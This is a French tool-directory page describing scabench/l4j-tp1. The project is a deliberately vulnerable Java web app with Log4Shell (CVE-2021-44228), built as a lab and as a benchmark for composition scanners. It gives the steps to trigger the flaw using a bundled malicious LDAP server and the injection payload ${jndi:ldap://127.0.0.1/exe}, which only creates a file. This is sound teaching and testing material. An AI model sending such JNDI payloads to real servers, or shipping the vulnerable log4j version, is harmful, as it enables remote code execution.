Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
l4j-tp1 — projet web JEE avec la vulnérabilité log4shell (CVE-2021-44228) | Kitploit
Outils/GitHubGitHub/scabench/l4j-tp1
Analyse des VulnérabilitésExploitationSécurité WebSécurité de la Chaîne LogistiqueApprentissage et ÉducationLabs et Pratique
GitHubscabench/l4j-tp1

l4j-tp1

projet web JEE avec la vulnérabilité log4shell (CVE-2021-44228)

Voir le dépôt
il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

log4shell vrai positif

Ceci est un simple projet web avec une vulnérabilité log4shell. Le projet définit un simple service get scabench.HelloWorldService retournant une chaîne de texte brut hello world. Le service n'attend pas de paramètres, et si des paramètres sont rencontrés, une erreur est journalisée.

La dépendance vulnérable est org.apache.logging.log4j:log4j-core:2.14.1, la vulnérabilité est CVE-2021-44228.

Démontrer la vulnérabilité à l'aide d'un test

Cela nécessite unix ou macos. Il est facile de porter ce projet vers windows.

Un test unitaire est fourni pour démontrer la vulnérabilité. Le test nécessite un serveur ldap fournissant du code vulnérable, l'exécutable correspondant est fourni par le projet, il est défini dans un projet séparé https://github.com/jensdietrich/Log4J-RCE-Proof-Of-Concept basé sur https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept. Le dispositif de test gérera le démarrage et l'arrêt du serveur ldap.

Le test créera un fichier foo basé sur une commande encodée intégrée dans le code du serveur ldap auquel log4j se connecte (touch foo). Ce serveur peut être contrôlé par un attaquant.

Pour exécuter le test, construisez le projet avec mvn test.

Démontrer la vulnérabilité en exécutant l'application

  1. démarrez le serveur web intégré : mvn jetty:run
  2. démarrez le serveur ldap inclus : java -jar dodgy-ldap-server.jar (le code vulnérable téléchargera du code Java depuis ce serveur)
  3. pointez le navigateur vers http://localhost:8080/, ce site contient un formulaire pré-rempli avec une charge utile malveillante ${jndi:ldap://127.0.0.1/exe}
  4. soumettez ce formulaire
  5. cela créera un fichier foo sur le serveur

Exécuter des analyses de composition logicielle

Il existe plusieurs scripts sh pour exécuter différentes analyses, les rapports de résultats se trouvent dans scan-results.

Générer le SBOM

Le pom.xml dispose d'un plugin pour générer un SBOM au format CycloneDX. Pour ce faire, exécutez mvn cyclonedx:makePackageBom, le SBOM peut être trouvé dans target/ au format json et xml.

Télécharger l’outil